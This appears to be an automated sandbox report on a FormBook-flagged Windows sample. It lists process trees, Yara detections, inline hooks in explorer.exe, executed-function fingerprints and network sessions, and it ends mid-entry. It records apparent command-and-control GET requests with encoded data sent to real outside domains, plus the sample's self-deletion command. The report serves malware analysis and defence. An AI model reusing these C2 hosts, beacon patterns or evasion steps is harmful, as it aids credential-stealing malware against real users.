68 65 61 64 3e 3c 2f 68 74 6d 6c 3e Data Ascii: <!DOCTYPE html><html><head><script>window.onload=function(){window.location.href="/lander?R2M=NjOhAHzH5LxTCNrP&uTm4=om+RAj8+1U0Z4Q5rkk8b3M9JRGUJ2euP6f07OPQVfzk2A/ET/uqRAGThuS9IxznZs+QL"}</script></head></html>

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
5	192.168.2.9	49722	66.147.240.91	80	3504	C:\Windows\explorer.exe

Timestamp	Bytes transferred	Direction	Data
Apr 8, 2024 15:25:48.239106894 CEST	169	OUT	GET /vr01/?R2M=NjOhAHzH5LxTCNrP&uTm4=wFZ5enF1tq9XrqHWNXhfStMJiblJh5bHmGRWjDpakqkf/10aPf5zMfbio2tqs2yXyxpi HTTP/1.1 Host: www.oregonjobs.co Connection: close Data Raw: 00 00 00 00 00 00 00 Data Ascii:
Apr 8, 2024 15:25:48.442342043 CEST	479	IN	HTTP/1.1 404 Not Found Date: Mon, 08 Apr 2024 13:25:48 GMT Server: Apache Content-Length: 315 Connection: close Content-Type: text/html; charset=iso-8859-1 Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 0a 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 44 6f 63 75 6d 65 6e 74 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 65 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0a Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL was not found on this server.</p><p>Additionally, a 404 Not Founderror was encountered while trying to use an ErrorDocument to handle the request.</p></body></html>

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
6	192.168.2.9	49723	172.67.154.171	80	3504	C:\Windows\explorer.exe

Timestamp	Bytes transferred	Direction	Data
Apr 8, 2024 15:26:08.604254007 CEST	173	OUT	GET /vr01/?uTm4=4lP9+b8r1hHYuPjiih6w+ijrcjXpUPjRDd99FwKlJ6rbETvBe77stQ4feUetoD8uHBUT&R2M=NjOhAHzH5LxTCNrP HTTP/1.1 Host: www.helyibudapest.com Connection: close Data Raw: 00 00 00 00 00 00 00 Data Ascii:
Apr 8, 2024 15:26:09.253618956 CEST	1058	IN	HTTP/1.1 301 Moved Permanently Date: Mon, 08 Apr 2024 13:26:09 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: close Expires: Wed, 11 Jan 1984 05:00:00 GMT Cache-Control: no-cache, must-revalidate, max-age=0 X-UA-Compatible: IE=edge X-Redirect-By: WordPress Location: http://helyibudapest.com/vr01/?uTm4=4lP9+b8r1hHYuPjiih6w+ijrcjXpUPjRDd99FwKlJ6rbETvBe77stQ4feUetoD8uHBUT&R2M=NjOhAHzH5LxTCNrP X-Content-Type-Options: nosniff X-XSS-Protection: 1; mode=block X-Frame-Options: SAMEORIGIN Strict-Transport-Security: max-age=31536000; includeSubDomains; preload CF-Cache-Status: DYNAMIC Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=JRih7uQ%2BPIqAs5eQnScCOomhSEPixIahAZtsdW2AGwL1QUVK%2F3k56ptcDMFxBz3WpGN5OkqUyPhVs63HDbOJPBBgNK9W%2F9uAGUIZtBswiWhELMoh2d8ihEl%2Be6Uq2a%2BHp5ZyZA%2FcIPo%3D"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 871296602e7f030a-MIA alt-svc: h3=":443"; ma=86400 Data Raw: 30 0d 0a 0d 0a Data Ascii: 0

Code Manipulations

User Modules

Hook Summary

Function Name	Hook Type	Active in Processes
PeekMessageA	INLINE	explorer.exe
PeekMessageW	INLINE	explorer.exe
GetMessageW	INLINE	explorer.exe
GetMessageA	INLINE	explorer.exe

Processes

Process: explorer.exe, Module: user32.dll

Function Name	Hook Type	New Data
PeekMessageA	INLINE	0x48 0x8B 0xB8 0x82 0x2E 0xEF
PeekMessageW	INLINE	0x48 0x8B 0xB8 0x8A 0xAE 0xEF
GetMessageW	INLINE	0x48 0x8B 0xB8 0x8A 0xAE 0xEF
GetMessageA	INLINE	0x48 0x8B 0xB8 0x82 0x2E 0xEF

Target ID:	0
Start time:	15:22:23
Start date:	08/04/2024
Path:	C:\Users\user\Desktop\hj3YCvtlg7.exe
Wow64 process (32bit):	true
Commandline:	"C:\Users\user\Desktop\hj3YCvtlg7.exe"
Imagebase:	0x8c0000
File size:	670'728 bytes
MD5 hash:	DAD6E1001C72B68D690FEDF88254F157
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Yara matches:	Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 00000000.00000002.1354193570.0000000003DEE000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security Rule: JoeSecurity_FormBook_1, Description: Yara detected FormBook, Source: 00000000.00000002.1354193570.0000000003DEE000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security Rule: Windows_Trojan_Formbook_1112e116, Description: unknown, Source: 00000000.00000002.1354193570.0000000003DEE000.00000004.00000800.00020000.00000000.sdmp, Author: unknown Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 00000000.00000002.1354193570.0000000003DEE000.00000004.00000800.00020000.00000000.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com Rule: Formbook, Description: detect Formbook in memory, Source: 00000000.00000002.1354193570.0000000003DEE000.00000004.00000800.00020000.00000000.sdmp, Author: JPCERT/CC Incident Response Group
Reputation:	low
Has exited:	true

Show Windows behavior

Target ID:	3
Start time:	15:22:25
Start date:	08/04/2024
Path:	C:\Users\user\Desktop\hj3YCvtlg7.exe
Wow64 process (32bit):	false
Commandline:	"C:\Users\user\Desktop\hj3YCvtlg7.exe"
Imagebase:	0x1b0000
File size:	670'728 bytes
MD5 hash:	DAD6E1001C72B68D690FEDF88254F157
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	low
Has exited:	true

Show Windows behavior

Target ID:	4
Start time:	15:22:25
Start date:	08/04/2024
Path:	C:\Users\user\Desktop\hj3YCvtlg7.exe
Wow64 process (32bit):	false
Commandline:	"C:\Users\user\Desktop\hj3YCvtlg7.exe"
Imagebase:	0x250000
File size:	670'728 bytes
MD5 hash:	DAD6E1001C72B68D690FEDF88254F157
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	low
Has exited:	true

Show Windows behavior

Target ID:	5
Start time:	15:22:25
Start date:	08/04/2024
Path:	C:\Users\user\Desktop\hj3YCvtlg7.exe
Wow64 process (32bit):	true
Commandline:	"C:\Users\user\Desktop\hj3YCvtlg7.exe"
Imagebase:	0xbd0000
File size:	670'728 bytes
MD5 hash:	DAD6E1001C72B68D690FEDF88254F157
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Yara matches:	Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 00000005.00000002.1404667861.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Author: Joe Security Rule: JoeSecurity_FormBook_1, Description: Yara detected FormBook, Source: 00000005.00000002.1404667861.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Author: Joe Security Rule: Windows_Trojan_Formbook_1112e116, Description: unknown, Source: 00000005.00000002.1404667861.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Author: unknown Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 00000005.00000002.1404667861.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com Rule: Formbook, Description: detect Formbook in memory, Source: 00000005.00000002.1404667861.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Author: JPCERT/CC Incident Response Group
Reputation:	low
Has exited:	true

Show Windows behavior

Target ID:	6
Start time:	15:22:25
Start date:	08/04/2024
Path:	C:\Windows\explorer.exe
Wow64 process (32bit):	false
Commandline:	C:\Windows\Explorer.EXE
Imagebase:	0x7ff633410000
File size:	5'141'208 bytes
MD5 hash:	662F4F92FDE3557E86D110526BB578D5
Has elevated privileges:	false
Has administrator privileges:	false
Programmed in:	C, C++ or other language
Reputation:	high
Has exited:	false

Show Windows behavior

Target ID:	7
Start time:	15:22:27
Start date:	08/04/2024
Path:	C:\Windows\SysWOW64\ipconfig.exe
Wow64 process (32bit):	true
Commandline:	"C:\Windows\SysWOW64\ipconfig.exe"
Imagebase:	0xc70000
File size:	29'184 bytes
MD5 hash:	3A3B9A5E00EF6A3F83BF300E2B6B67BB
Has elevated privileges:	false
Has administrator privileges:	false
Programmed in:	C, C++ or other language
Yara matches:	Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 00000007.00000002.3819331140.00000000001D0000.00000040.80000000.00040000.00000000.sdmp, Author: Joe Security Rule: JoeSecurity_FormBook_1, Description: Yara detected FormBook, Source: 00000007.00000002.3819331140.00000000001D0000.00000040.80000000.00040000.00000000.sdmp, Author: Joe Security Rule: Windows_Trojan_Formbook_1112e116, Description: unknown, Source: 00000007.00000002.3819331140.00000000001D0000.00000040.80000000.00040000.00000000.sdmp, Author: unknown Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 00000007.00000002.3819331140.00000000001D0000.00000040.80000000.00040000.00000000.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com Rule: Formbook, Description: detect Formbook in memory, Source: 00000007.00000002.3819331140.00000000001D0000.00000040.80000000.00040000.00000000.sdmp, Author: JPCERT/CC Incident Response Group Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 00000007.00000002.3821325493.0000000000780000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security Rule: JoeSecurity_FormBook_1, Description: Yara detected FormBook, Source: 00000007.00000002.3821325493.0000000000780000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security Rule: Windows_Trojan_Formbook_1112e116, Description: unknown, Source: 00000007.00000002.3821325493.0000000000780000.00000004.00000800.00020000.00000000.sdmp, Author: unknown Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 00000007.00000002.3821325493.0000000000780000.00000004.00000800.00020000.00000000.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com Rule: Formbook, Description: detect Formbook in memory, Source: 00000007.00000002.3821325493.0000000000780000.00000004.00000800.00020000.00000000.sdmp, Author: JPCERT/CC Incident Response Group Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 00000007.00000002.3820465500.0000000000750000.00000040.10000000.00040000.00000000.sdmp, Author: Joe Security Rule: JoeSecurity_FormBook_1, Description: Yara detected FormBook, Source: 00000007.00000002.3820465500.0000000000750000.00000040.10000000.00040000.00000000.sdmp, Author: Joe Security Rule: Windows_Trojan_Formbook_1112e116, Description: unknown, Source: 00000007.00000002.3820465500.0000000000750000.00000040.10000000.00040000.00000000.sdmp, Author: unknown Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 00000007.00000002.3820465500.0000000000750000.00000040.10000000.00040000.00000000.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com Rule: Formbook, Description: detect Formbook in memory, Source: 00000007.00000002.3820465500.0000000000750000.00000040.10000000.00040000.00000000.sdmp, Author: JPCERT/CC Incident Response Group
Reputation:	moderate
Has exited:	false

Show Windows behavior

Target ID:	8
Start time:	15:22:30
Start date:	08/04/2024
Path:	C:\Windows\SysWOW64\cmd.exe
Wow64 process (32bit):	true
Commandline:	/c del "C:\Users\user\Desktop\hj3YCvtlg7.exe"
Imagebase:	0xc50000
File size:	236'544 bytes
MD5 hash:	D0FCE3AFA6AA1D58CE9FA336CC2B675B
Has elevated privileges:	false
Has administrator privileges:	false
Programmed in:	C, C++ or other language
Reputation:	high
Has exited:	true

Show Windows behavior

Target ID:	9
Start time:	15:22:31
Start date:	08/04/2024
Path:	C:\Windows\System32\conhost.exe
Wow64 process (32bit):	false
Commandline:	C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Imagebase:	0x7ff70f010000
File size:	862'208 bytes
MD5 hash:	0D698AF330FD17BEE3BF90011D49251D
Has elevated privileges:	false
Has administrator privileges:	false
Programmed in:	C, C++ or other language
Reputation:	high
Has exited:	true

Show Windows behavior

Execution Graph

Execution Coverage:	7.6%
Dynamic/Decrypted Code Coverage:	100%
Signature Coverage:	0%
Total number of Nodes:	55
Total number of Limit Nodes:	9

Executed Functions

Function 010CD429 Relevance: 6.1, APIs: 4, Instructions: 130
threadCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

GetCurrentProcess.KERNEL32 ref: 010CD4B6
GetCurrentThread.KERNEL32 ref: 010CD4F3
GetCurrentProcess.KERNEL32 ref: 010CD530
GetCurrentThreadId.KERNEL32 ref: 010CD589

Memory Dump Source

Source File: 00000000.00000002.1353446721.00000000010C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 010C0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_10c0000_hj3YCvtlg7.jbxd

Similarity

API ID: Current$ProcessThread
String ID:
API String ID: 2063062207-0
Opcode ID: 5f8c65ff6296e160dcfec8c643b45f01fdc038b94161b6eba809957f59001c1b
Instruction ID: 05e14faa6d1ce4ef8fa2bc8e3fa00fda7d6f35d6e50a71c3b2383c094d62cb8e
Opcode Fuzzy Hash: 5f8c65ff6296e160dcfec8c643b45f01fdc038b94161b6eba809957f59001c1b
Instruction Fuzzy Hash: 375157B09007098FEB54CFA9D5487EEBBF1AF48314F20846DE149A7390DB745984CFA5

Uniqueness

Uniqueness Score: -1.00%

Function 010CD438 Relevance: 6.1, APIs: 4, Instructions: 128
threadCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

GetCurrentProcess.KERNEL32 ref: 010CD4B6
GetCurrentThread.KERNEL32 ref: 010CD4F3
GetCurrentProcess.KERNEL32 ref: 010CD530
GetCurrentThreadId.KERNEL32 ref: 010CD589

Memory Dump Source

Source File: 00000000.00000002.1353446721.00000000010C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 010C0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_10c0000_hj3YCvtlg7.jbxd

Similarity

API ID: Current$ProcessThread
String ID:
API String ID: 2063062207-0
Opcode ID: a5b970c49a36ec87a39faf1300f86c6fdfb26ce3e90ab76ad94d9c9a90c81e73
Instruction ID: b294df50a179e1d11c271eeb47da84f4d17935c30d7a456393eaf2b9de9c14a9
Opcode Fuzzy Hash: a5b970c49a36ec87a39faf1300f86c6fdfb26ce3e90ab76ad94d9c9a90c81e73
Instruction Fuzzy Hash: 365167B09007099FEB54CFAAD548BDEBBF1BB48314F20845DE009A7390DB74A984CFA5

Uniqueness

Uniqueness Score: -1.00%

Function 010CADA8 Relevance: 1.7, APIs: 1, Instructions: 196
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

GetModuleHandleW.KERNELBASE(00000000), ref: 010CAFFE

Memory Dump Source

Source File: 00000000.00000002.1353446721.00000000010C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 010C0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_10c0000_hj3YCvtlg7.jbxd

Similarity

API ID: HandleModule
String ID:
API String ID: 4139908857-0
Opcode ID: b9c5261915d47685ce7a5fed9a247e3d1e82a7c0d49ca44927351dfa5876a32d
Instruction ID: 37feaaeb8080a15deacc000f63c57e078b37636acfb47c850d514c1acadb163d
Opcode Fuzzy Hash: b9c5261915d47685ce7a5fed9a247e3d1e82a7c0d49ca44927351dfa5876a32d
Instruction Fuzzy Hash: 81711070A00B09CFE764DF69D45479ABBF1BF88600F108A6DD48ADBA40EB74E8458F90

Uniqueness

Uniqueness Score: -1.00%

Function 010C590C Relevance: 1.6, APIs: 1, Instructions: 97
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

CreateActCtxA.KERNEL32(?), ref: 010C59C9

Memory Dump Source

Source File: 00000000.00000002.1353446721.00000000010C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 010C0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_10c0000_hj3YCvtlg7.jbxd

Similarity

API ID: Create
String ID:
API String ID: 2289755597-0
Opcode ID: 7a9adafa8b361f25a8038d32c35badbab7996e89a1d80a9caaca12f9741e1e8c
Instruction ID: ccce8f0489422c26c53c70a1bb8cd86128536d00bcf5ff06c761a745f4d7b833
Opcode Fuzzy Hash: 7a9adafa8b361f25a8038d32c35badbab7996e89a1d80a9caaca12f9741e1e8c
Instruction Fuzzy Hash: C141CFB4D00719CBEB24CFAAC8847CEBBF1BF49704F20806AD448AB251DB756946CF90

Uniqueness

Uniqueness Score: -1.00%

Function 010C44B0 Relevance: 1.6, APIs: 1, Instructions: 96
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

CreateActCtxA.KERNEL32(?), ref: 010C59C9

Memory Dump Source

Source File: 00000000.00000002.1353446721.00000000010C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 010C0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_10c0000_hj3YCvtlg7.jbxd

Similarity

API ID: Create
String ID:
API String ID: 2289755597-0
Opcode ID: 13eee49f18cdfe0c7bfd61d53a26f39ce9b6b27901208d2e91db0199a1529e06
Instruction ID: 32b6273360cf618aeb6a160d7cc8a0ac24690d494559cf374f5902d18db565f8
Opcode Fuzzy Hash: 13eee49f18cdfe0c7bfd61d53a26f39ce9b6b27901208d2e91db0199a1529e06
Instruction Fuzzy Hash: 2341CEB4D0071DCBDB24CFAAC884BCEBBB5BB49704F20846AD448AB251DB756945CF90

Uniqueness

Uniqueness Score: -1.00%

Function 010CD680 Relevance: 1.6, APIs: 1, Instructions: 62
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

DuplicateHandle.KERNELBASE(?,?,?,?,?,?,?), ref: 010CD707

Memory Dump Source

Source File: 00000000.00000002.1353446721.00000000010C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 010C0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_10c0000_hj3YCvtlg7.jbxd

Similarity

API ID: DuplicateHandle
String ID:
API String ID: 3793708945-0
Opcode ID: 82d9a0e4768235e29befe85cc16a9d109bd9fe594af8b1eb159543d37bc15f86
Instruction ID: 570f647493001b5eba8a38e0d54f2b22c9968215c3de0a867e76a353094eeb28
Opcode Fuzzy Hash: 82d9a0e4768235e29befe85cc16a9d109bd9fe594af8b1eb159543d37bc15f86
Instruction Fuzzy Hash: 0321E4B5900249DFDB10CF9AD584ADEBBF4FB48310F14842AE958A3350D374A944CFA0

Uniqueness

Uniqueness Score: -1.00%

Function 010CD679 Relevance: 1.6, APIs: 1, Instructions: 61
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

DuplicateHandle.KERNELBASE(?,?,?,?,?,?,?), ref: 010CD707

Memory Dump Source

Source File: 00000000.00000002.1353446721.00000000010C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 010C0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_10c0000_hj3YCvtlg7.jbxd

Similarity

API ID: DuplicateHandle
String ID:
API String ID: 3793708945-0
Opcode ID: 2b1ab45f140f6f6e25290201fc36aa5cd36bdf57b6b5b0db9a5523edafd8f29a
Instruction ID: 6a1a6b6387a0819b9e01d4ef829a25f1ccfb9ddea41e0a4a7b58144ff7cefaab
Opcode Fuzzy Hash: 2b1ab45f140f6f6e25290201fc36aa5cd36bdf57b6b5b0db9a5523edafd8f29a
Instruction Fuzzy Hash: 4921F3B5900249DFDB10CFAAD584ADEBBF4FB48310F14846AE958B3350D378A944CFA0

Uniqueness

Uniqueness Score: -1.00%

Function 010CA168 Relevance: 1.6, APIs: 1, Instructions: 55
libraryCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

LoadLibraryExW.KERNELBASE(00000000,00000000,?,?,?,?,00000000,?,010CB079,00000800,00000000,00000000), ref: 010CB28A

Memory Dump Source

Source File: 00000000.00000002.1353446721.00000000010C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 010C0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_10c0000_hj3YCvtlg7.jbxd

Similarity

API ID: LibraryLoad
String ID:
API String ID: 1029625771-0
Opcode ID: 4b06729a173b700124e0d8c3560c6dabcca57f31176abc885d8dd9e225852133
Instruction ID: b6e74a841137d26ce545699cc8c9fe77d106a9ee9c078f8ba94b93840604c763
Opcode Fuzzy Hash: 4b06729a173b700124e0d8c3560c6dabcca57f31176abc885d8dd9e225852133
Instruction Fuzzy Hash: 451100B68002099FDB10CF9AD444B9EFBF9EB48710F10846EE959B7200C379A545CFA5

Uniqueness

Uniqueness Score: -1.00%

Function 010CB218 Relevance: 1.6, APIs: 1, Instructions: 54
libraryCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

LoadLibraryExW.KERNELBASE(00000000,00000000,?,?,?,?,00000000,?,010CB079,00000800,00000000,00000000), ref: 010CB28A

Memory Dump Source

Source File: 00000000.00000002.1353446721.00000000010C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 010C0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_10c0000_hj3YCvtlg7.jbxd

Similarity

API ID: LibraryLoad
String ID:
API String ID: 1029625771-0
Opcode ID: 97dfd446ec7b8a7fd133f4cf75bee3bfbf89dca21b054cb96320360d7dae5c62
Instruction ID: 76605e405f3a728bbd0b520cc2c124debe2b8c6e68738b56c4e50485709f2bf0
Opcode Fuzzy Hash: 97dfd446ec7b8a7fd133f4cf75bee3bfbf89dca21b054cb96320360d7dae5c62
Instruction Fuzzy Hash: AD1153B68003098FDB10CFAAC444BDEFBF4EB88310F10846EE958A7600C375A545CFA0

Uniqueness

Uniqueness Score: -1.00%

Function 010CAF98 Relevance: 1.5, APIs: 1, Instructions: 47
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

GetModuleHandleW.KERNELBASE(00000000), ref: 010CAFFE

Memory Dump Source

Source File: 00000000.00000002.1353446721.00000000010C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 010C0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_10c0000_hj3YCvtlg7.jbxd

Similarity

API ID: HandleModule
String ID:
API String ID: 4139908857-0
Opcode ID: 01d9a0b56c881c73f32217797035fb77beea7ab32fc7266711c6d093a212814e
Instruction ID: 1651e3b9c9b2ed9abb5b2ca9be8473db374399870021a0f980f59eadb47f82d9
Opcode Fuzzy Hash: 01d9a0b56c881c73f32217797035fb77beea7ab32fc7266711c6d093a212814e
Instruction Fuzzy Hash: 5B1110B5C002498FDB20CF9AC444BDEFBF4AB88314F10846ED969B7210D379A545CFA1

Uniqueness

Uniqueness Score: -1.00%

Function 07341090 Relevance: 1.5, APIs: 1, Instructions: 47
windowCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

PostMessageW.USER32(?,00000010,00000000,?), ref: 0734AA6D

Memory Dump Source

Source File: 00000000.00000002.1356964784.0000000007340000.00000040.00000800.00020000.00000000.sdmp, Offset: 072D0000, based on PE: true

Associated: 00000000.00000002.1356812219.00000000072D0000.00000004.08000000.00040000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_72d0000_hj3YCvtlg7.jbxd

Similarity

API ID: MessagePost
String ID:
API String ID: 410705778-0
Opcode ID: 1326ed214400fd877c71b61ec47a472657eaee0f4cf4d269144a50c6307c7078
Instruction ID: e4da64897f3ea25e12b4f09f2b3067b85ce30410faaca64762f3ecc95bf88d7c
Opcode Fuzzy Hash: 1326ed214400fd877c71b61ec47a472657eaee0f4cf4d269144a50c6307c7078
Instruction Fuzzy Hash: 9711F2B68003499FEB10DF9AC584BDEBBF8EB48310F10881AE959B7240D375A944CFA1

Uniqueness

Uniqueness Score: -1.00%

Function 0106D1D4 Relevance: .1, Instructions: 72COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.1353297296.000000000106D000.00000040.00000800.00020000.00000000.sdmp, Offset: 0106D000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_106d000_hj3YCvtlg7.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: d034da0ac4f647ebfa7c75d76c63c714c988db5212ca1415900eabfbb38f278d
Instruction ID: d7f190f0231a9693bf3537cbe1ebd2add1044c882dcb68219361463c7c695e79
Opcode Fuzzy Hash: d034da0ac4f647ebfa7c75d76c63c714c988db5212ca1415900eabfbb38f278d
Instruction Fuzzy Hash: 04212971604345EFDB05DF94D5C0B29BBA9FB94324F24C5ADD8C94B292C336D446CB61

Uniqueness

Uniqueness Score: -1.00%

Function 0106D01C Relevance: .1, Instructions: 72COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.1353297296.000000000106D000.00000040.00000800.00020000.00000000.sdmp, Offset: 0106D000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_106d000_hj3YCvtlg7.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: f7385a1f417ee7e08a1cf06335cc25bc762ad4179d25c9d241d34f6a826bf092
Instruction ID: a7808422ad00557701799ed0c0299dcb17f23a82cd07cc941e60ed8e449edb4d
Opcode Fuzzy Hash: f7385a1f417ee7e08a1cf06335cc25bc762ad4179d25c9d241d34f6a826bf092
Instruction Fuzzy Hash: A9210371604340DFEB15DF54D4C0B26BBA9EB84214F24C5A9E88A4B282C336D407CBA1

Uniqueness

Uniqueness Score: -1.00%

Function 0106D006 Relevance: .1, Instructions: 62COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.1353297296.000000000106D000.00000040.00000800.00020000.00000000.sdmp, Offset: 0106D000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_106d000_hj3YCvtlg7.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 24ce1ffb9bdea7112a8d852e9ba7a658780899987e39981f1dc16fd3dcbecf04
Instruction ID: 94103fed6be89dc2a59d03d8099246a27cf017a7edd63f8411f8e018ae3e25fd
Opcode Fuzzy Hash: 24ce1ffb9bdea7112a8d852e9ba7a658780899987e39981f1dc16fd3dcbecf04
Instruction Fuzzy Hash: 5E21A7755093808FDB13CF64D590715BFB1EF46214F28C5DAD8898F6A7C33A980ACB62

Uniqueness

Uniqueness Score: -1.00%

Function 0106D1CF Relevance: .1, Instructions: 53COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.1353297296.000000000106D000.00000040.00000800.00020000.00000000.sdmp, Offset: 0106D000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_106d000_hj3YCvtlg7.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 0571d9b095afed8b546122286ae05565a289416437c47d1601190cbee81fcf2c
Instruction ID: 75969b1de40a323216176f7564c9af9720442bdbf6be99589d2a04f7586aa17a
Opcode Fuzzy Hash: 0571d9b095afed8b546122286ae05565a289416437c47d1601190cbee81fcf2c
Instruction Fuzzy Hash: 9A11BB75604280DFCB12CF54C5C0B15BBA1FB84224F28C6AAD8894B696C33AD44ACB61

Uniqueness

Uniqueness Score: -1.00%

Function 0105D759 Relevance: .0, Instructions: 45COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.1353268028.000000000105D000.00000040.00000800.00020000.00000000.sdmp, Offset: 0105D000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_105d000_hj3YCvtlg7.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 0a913e907b0e083774a4a13b27dc7a2e8857dfab8d3d14b8a5082fdc4577a69f
Instruction ID: e865f7dab9fbca2c1a872c759fedc7b0e22236dae6d90f0b368d9253e282f4df
Opcode Fuzzy Hash: 0a913e907b0e083774a4a13b27dc7a2e8857dfab8d3d14b8a5082fdc4577a69f
Instruction Fuzzy Hash: 9701A731104388DFF7904A95CD84B6BBBD8FF41221F18855BED494A286E6799844C772

Uniqueness

Uniqueness Score: -1.00%

Function 0105D758 Relevance: .0, Instructions: 36COMMON

Download Yara Rule

Memory Dump Source

